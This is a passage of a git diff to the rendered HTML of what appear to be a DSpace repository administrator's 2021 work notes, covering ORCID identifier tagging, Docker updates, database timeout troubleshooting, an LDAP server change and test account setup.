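if __name__ == "__main__":
    query = {
        "size": 10,
        "query": {"bool": {"filter": {"term": {"repo.keyword": "CGSpace"}}}},
    }
    for hit in scroll_all(query):
        print(hit.get("_id"))
```

The `post` parameter is injectable so the paging logic can be exercised with a stub instead of the live server.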
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -525,46 +525,46 @@ $ curl -X POST 'https://cgspace.cgiar.org/explor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -1331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/2021-08-25-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +1331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • After I combined them and removed duplicates, I resolved all the names using my resolve-orcids.py script:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Tag existing items from the Alliance’s new authors with ORCID iDs using add-orcid-identifiers-csv.py (181 new metadata fields added):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ cat 2021-08-25-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Jager M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304" 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
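A minimal sketch of how the two-column CSV above can be sanity-checked before tagging, assuming the same ORCID pattern as the earlier `grep -oE` call. This is not how `add-orcid-identifiers-csv.py` itself works; the function name `orcids_by_author` and the in-memory sample are hypothetical and only for illustration. Searching for the iD instead of splitting on `": "` tolerates irregular spacing such as `Ivy Kinyua :0000-0002-1978-8833`.

```python
import csv
import io
import re

# Same pattern as the grep -oE call used to combine the ORCID lists.
ORCID_RE = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def orcids_by_author(csv_text):
    """Map each dc.contributor.author value to the ORCID iD in its identifier column.

    Hypothetical helper: rows whose identifier has no ORCID-shaped
    substring are skipped rather than guessed at.
    """
    result = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        match = ORCID_RE.search(row["cg.creator.identifier"])
        if match:
            result[row["dc.contributor.author"]] = match.group(0)
    return result


# A few rows copied from the CSV above, including the one with odd spacing.
sample = '''dc.contributor.author,cg.creator.identifier
"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
'''

mapping = orcids_by_author(sample)
unique_ids = sorted(set(mapping.values()))
print(unique_ids)
```

Several name variants map to one iD, so the number of distinct iDs is smaller than the number of rows.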

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-08-29

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ cat 2021-08-25-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Jager M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304" 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-08-29

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Run a full harvest on AReS
• Also do more work the past few days on OpenRXV
diff --git a/docs/2021-09/index.html b/docs/2021-09/index.html
index fb47a7162..44d1046f8 100644
--- a/docs/2021-09/index.html
+++ b/docs/2021-09/index.html
@@ -48,7 +48,7 @@ The syntax Moayad showed me last month doesn’t seem to honor the search qu
 "/>
-
+
@@ -154,9 +154,9 @@ The syntax Moayad showed me last month doesn’t seem to honor the search qu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Update Docker images on AReS server (linode20) and rebuild OpenRXV:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then run system updates and reboot the server
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • After the system came back up I started a fresh re-harvesting
@@ -201,8 +201,8 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Looking at the PDF’s metadata I see:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Producer: iLovePDF
@@ -236,11 +236,11 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ cat 2021-09-15-add-orcids.csv                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ cat 2021-09-15-add-orcids.csv                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using
@@ -273,42 +273,42 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • But the DSpace log file shows tons of database issues:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -14779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +14779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • The earliest one I see is around midnight (now is 2PM):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-09-17 00:01:49,572 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2021-09-17 00:01:49,572 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • But I was definitely logged into the site this morning so there were no issues then…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • It seems that a few errors are normal, but there’s obviously something wrong today:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-01:116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-02:163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-03:77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-04:13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-05:310
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-06:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-07:29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-08:86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-09:24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-10:26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-11:12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-12:5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-13:10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-14:102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-15:542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-16:368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -dspace.log.2021-09-17:15235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-01:116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-02:163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-03:77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-04:13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-05:310
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-06:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-07:29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-08:86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-09:24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-10:26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-11:12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-12:5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-13:10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-14:102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-15:542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-16:368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +dspace.log.2021-09-17:15235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I restarted the server and DSpace came up fine… so it must have been some kind of fluke
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Continue working on cleaning up and annotating the metadata registry on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -338,9 +338,9 @@ dspace.log.2021-09-17:15235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-20

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-20

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I synchronized the production CGSpace PostreSQL, Solr, and Assetstore data with DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Over the weekend a few users reported that they could not log into CGSpace @@ -349,10 +349,10 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decomissioned the old one last week
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -361,8 +361,8 @@ ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
